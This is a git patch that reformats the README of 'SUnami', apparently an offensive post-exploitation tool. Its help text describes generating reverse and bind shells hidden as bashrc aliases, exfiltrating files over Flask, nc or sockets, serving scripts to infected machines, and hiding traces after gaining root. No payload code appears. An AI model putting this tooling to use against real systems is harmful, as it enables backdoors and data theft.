From 2ddbf2bab54a7ebf2fb5a2c516b3acb8475a64ec Mon Sep 17 00:00:00 2001 From: alchemist Date: Wed, 9 Aug 2023 19:47:40 +0300 Subject: [PATCH] Updated README.md --- README.md | 58 ++++++++++++++++++++++++++++++------------------------- 1 file changed, 32 insertions(+), 26 deletions(-) diff --git a/README.md b/README.md index 04731d8..485fee8 100644 --- a/README.md +++ b/README.md @@ -11,7 +11,7 @@ witchdocsec, TheA1ch3m1st # Notice - using the shells and socket based exfil will throw an error in the targets shell if your listener isn't active. be sure to clean up after gaining root. For the most stealth with file exfil we suggest the built in flask server. Currently our built in listener works best with bash shells. for nc shells using ncs own listener is recommended. + Using the shells and socket based exfil will throw an error in the targets shell if your listener isn't active. Be sure to clean up after gaining root. For the most stealth with file exfil, we suggest the built-in flask server. Currently our built in listener works best with bash shells. For nc shells using ncs own listener is recommended. # File Exfiltration @@ -28,28 +28,34 @@ I used passwd so as not to leak my hash for this demo but rest assured you can r ## Usage sunami.py [-local {1,0}] rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA] # Help -genshell generates the shell to be edited in the bashrc file as an alias - --ip ip to connect to - --port port to connect to - --shelltype type of shell to use (reverse, bind) - default is reverse - --shell type of shell to generate - default is bash - reverse bash, nc, nce - bind nc - -protocol type of protocol, will not affect most shells (tcp, udp) - default is tcp - -listen will automatically run a listener after outputting the shell (1, 0) - usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen] - -exfilfile exfiltrates files using several methods - --file file to exfiltrate - --method method to use (postflask, nc, pysocket) - --ip ip to send to - --port port to send to - usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT] - -rfs runs flask server serving your sh files to run from the attacker machine - --ip ip to run server on - --port port to run server on - --file file to run on infected machine - --vars : - sets variables in the selected script using jinja2 template syntax - default is no variables - --schema schema to use (http, https) - default http - usage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA] \ No newline at end of file +``` +SUnami + +help outputs this page + +genshell generates the shell to be edited in the bashrc file as an alias + --ip ip to connect to + --port port to connect to + --shelltype type of shell to use (reverse, bind) - default is reverse + --shell type of shell to generate - default is bash + reverse bash, nc, nce + bind nc + -protocol type of protocol, will not affect most shells (tcp, udp) - default is tcp + -listen will automatically run a listener after outputting the shell + usage: sunami.py genshell [-h] [--ip IP] [--port PORT] [--shelltype SHELLTYPE] [--shell SHELL] [-protocol PROTOCOL] [-listen] + +exfilfile exfiltrates files using several methods + --file file to exfiltrate + --method method to use (postflask, nc, pysocket) + --ip ip to send to + --port port to send to + usage: sunami.py exfilfile [-h] [--file FILE] [--method {postflask,nc,pysocket}] [--ip IP] [--port PORT] + +rfs runs flask server serving your sh files to run from the attacker machine + --ip ip to run server on + --port port to run server on + --file file to run on infected machine + --vars : - sets variables in the selected script using jinja2 template syntax - default is no variables + --schema schema to use (http, https) - default http + useage: sunami.py rfs [-h] --ip IP --port PORT --file FILE [--vars VARS [VARS ...]] [--schema SCHEMA] +``` \ No newline at end of file